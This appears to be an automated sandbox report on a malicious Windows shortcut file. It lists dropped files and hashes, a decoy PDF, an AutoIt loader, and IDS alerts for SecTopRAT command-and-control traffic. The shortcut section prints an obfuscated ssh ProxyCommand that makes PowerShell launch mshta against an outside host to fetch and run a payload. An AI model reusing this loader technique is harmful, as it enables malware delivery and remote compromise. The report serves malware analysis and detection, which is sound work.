Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\b245950c-3a6e-4994-b9eb-00096b75c549.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\tmp1AEE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp1CEE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5257.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5268.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5315.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp67AF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp71DF.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpA7E7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpB560.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpBA76.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.848598812124929
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
MD5:	9664DAA86F8917816B588C715D97BE07
SHA1:	FAD9771763CD861ED8F3A57004C4B371422B7761
SHA-256:	8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
SHA-512:	E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpCF8B.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\i1040gi.pdf

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.7 (zip deflate encoded)
Category:	dropped
Size (bytes):	4389662
Entropy (8bit):	7.988621119477524
Encrypted:	false
SSDEEP:	98304:gP16MXdldXLkgB2JiVOT/OYZU6jV1jUSNc+/aKrd3qlbBIKUi:QFf9J0Jiw/Xh5USiyaUdalNIDi
MD5:	10B8EF2FF5A140F2F09236846C2222B7
SHA1:	7D96445BF195417E61D659C0CB086DDFB3217600
SHA-256:	90C8759C7A829D8C74296187CDBDB47BC9025480FFFC41FF5E7225889C8FEA7E
SHA-512:	0AE4DF84440751D57CDE216B2FE003C4307043EC5A64154987353BFC082A497CF4B974B9E3A92E7D90BA7A1F0A4DB12AA917E10D502D841D5B5B449031620824
Malicious:	false
Preview:	%PDF-1.7.%.....14 0 obj.<</Filter/FlateDecode/Length 1098>>stream.x.WYo.6.~...s.{......)v..-:@..>...l..6..E.}I..e.I0QlR....'... .Z~(...}.GQ...e.b........,..8....X.zsw.p.t...V+..M...#..e..r;W..0.h.W.....B.....l.....p[.2t..Q.......#Z~:zn..D.C.D..g.....'.:...lr.F..x.i6.m#........M.....e.Lq7y.B~..W....^...go.....@......A.\0...#.T6..C.w....#.llj....Y.N.....iS^..A.........<..8k.L....>.T=...yZ.(.9mc.....&....../z;../`.......>..k.D....3.5.....n....o.7n^.~&.$.....T.Aj.S"..H.V..C.....p.....9h.WB...mNB.. \.....F..W.......).;.x...\.S....q....z...0...d.bVPZddy..6...2.G...L.'.....q.Z.JHhA.g.N.#.w~..6?.FHW6.hn+.,>......n9+.q.\.9....$.Z...[.!.,y+...V.......W....f.Ph.I..i..v)?4..=.....O.......r.x.nE...h.......>...sK3Q....,k..C..4]V._px.1gi...#.........0TD;.8..L\|.R9.t...l9b....x..!...........@-[9.E..H.bC..N.R.e.uR..Z.r...9U...6.X....2.,X.19..Z.I.]..'P..Tq...~9N$....kO?^{j..\....MY.g.4.+.7.V.^.~5.v6!-.+....Rj..bK...u}i...k}.....s.9..P.b..av.....[9....

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\faggbgb\AutoIt3.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\27589682\updater.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	893608
Entropy (8bit):	6.620131693023677
Encrypted:	false
SSDEEP:	12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
MD5:	C56B5F0201A3B3DE53E561FE76912BFD
SHA1:	2A4062E10A5DE813F5688221DBEB3F3FF33EB417
SHA-256:	237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
SHA-512:	195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\faggbgb\ggkfcbc.a3x

Download File

Process:	C:\Users\user\AppData\Local\Temp\27589682\updater.exe
File Type:	data
Category:	dropped
Size (bytes):	2011444
Entropy (8bit):	6.104381684032337
Encrypted:	false
SSDEEP:	49152:DpD+okC1j/B5ZMQJrhES5Jr4l5/WSpCe/:gOZMt
MD5:	BCC04F3C8F29B9533C8AFF0681D4EB4F
SHA1:	2EDB98E832959106BC3E6110DFB0A20A549BDCB1
SHA-256:	D0E19B9FED36046A80CA84C68624EEED3FAC491962FC121D1D7B6433006990DC
SHA-512:	DCD54AE36962E5072BE4B31E20BC7D42A4FF9D90E95930F09A0CBDB6E0F7495A38409DEFCACF072C8C452188DBBF4863F5F8E21A24F50D36FFDAE61959176CF1
Malicious:	false
Preview:	\|.U..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................\|.U....................................

Static File Info

General

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Archive, ctime=Tue Mar 12 19:03:11 2024, mtime=Mon Jun 17 15:01:49 2024, atime=Tue Mar 12 19:03:11 2024, length=450560, window=hidenormalshowminimized
Entropy (8bit):	3.1166360561290474
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	fsg5PWtTm2.lnk
File size:	2'736 bytes
MD5:	3ad01b6c99c252f92d17473e8988ee2c
SHA1:	e47c28c2c573423016f2f799089c80491e4e12c4
SHA256:	26db835c118e06564f8074656bc403862848cc3d0b3761625a07cb4f33790902
SHA512:	ba7bd868a6e61c7e586be290c434d74c944177abf37704d3d35869e1996e814c84ad8efd4e77f848ae217af744067f9c510a210fdc859ed18c01f4125c0afb77
SSDEEP:	24:8V/BF//ZrQ9HYWGt1v+/+GgWbUkpi6ZvmywGiPSddpBpBuP9dThWUIeFIU:8FLZrCCGgaUkphuywGndbBpBU9C5W
TLSH:	DD517B102AF90B14F3B39E349436A320C57BBC01EEB04B1D004D51882B67614E5B1F7F
File Content Preview:	L..................F.@.. ......O.t...6a........O.t...............................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

File Icon


Icon Hash:	72d282828e8d8dd5

Static Windows Shortcut Info

General
Relative Path:	..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Command Line Argument:	-o ProxyCommand="powershell powershell -Command 'svaIml9wb7ET1?Evo1smshta https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s'.SubString(19, 57)" .
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-17T08:10:27.449637+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49745	172.217.17.46	443	TCP
2024-12-17T08:10:33.085428+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49765	172.217.17.46	443	TCP
2024-12-17T08:10:35.145473+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.7	49776	104.21.87.65	443	TCP
2024-12-17T08:10:35.961119+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49774	172.217.17.46	443	TCP
2024-12-17T08:10:38.524708+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49786	142.250.181.100	443	TCP
2024-12-17T08:10:41.964771+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49792	172.217.17.46	443	TCP
2024-12-17T08:10:44.766727+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49802	172.217.17.46	443	TCP
2024-12-17T08:10:45.734348+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:45.854458+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:45.975908+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.095883+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.215806+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.335679+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.455468+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.575517+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.696672+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.819115+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.865284+0100	2029217	ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init	1	185.147.124.236	15647	192.168.2.7	49810	TCP
2024-12-17T08:10:46.867148+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:46.938958+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.065449+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.185491+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:47.262193+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49808	142.250.181.100	443	TCP
2024-12-17T08:10:47.305449+0100	2051910	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity	1	192.168.2.7	49810	185.147.124.236	15647	TCP
2024-12-17T08:10:50.169345+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49816	172.217.17.46	443	TCP
2024-12-17T08:10:50.727590+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49821	185.147.124.236	9000	TCP
2024-12-17T08:10:52.343328+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49828	185.147.124.236	9000	TCP
2024-12-17T08:10:52.343328+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49828	185.147.124.236	9000	TCP
2024-12-17T08:10:52.979045+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49823	172.217.17.46	443	TCP
2024-12-17T08:10:53.885832+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49830	185.147.124.236	9000	TCP
2024-12-17T08:10:53.885832+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49830	185.147.124.236	9000	TCP
2024-12-17T08:10:55.431356+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49837	185.147.124.236	9000	TCP
2024-12-17T08:10:55.431356+0100	2052248	ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET)	1	192.168.2.7	49837	185.147.124.236	9000	TCP
2024-12-17T08:10:55.489385+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49832	142.250.181.100	443	TCP
2024-12-17T08:10:56.978520+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49843	185.147.124.236	9000	TCP
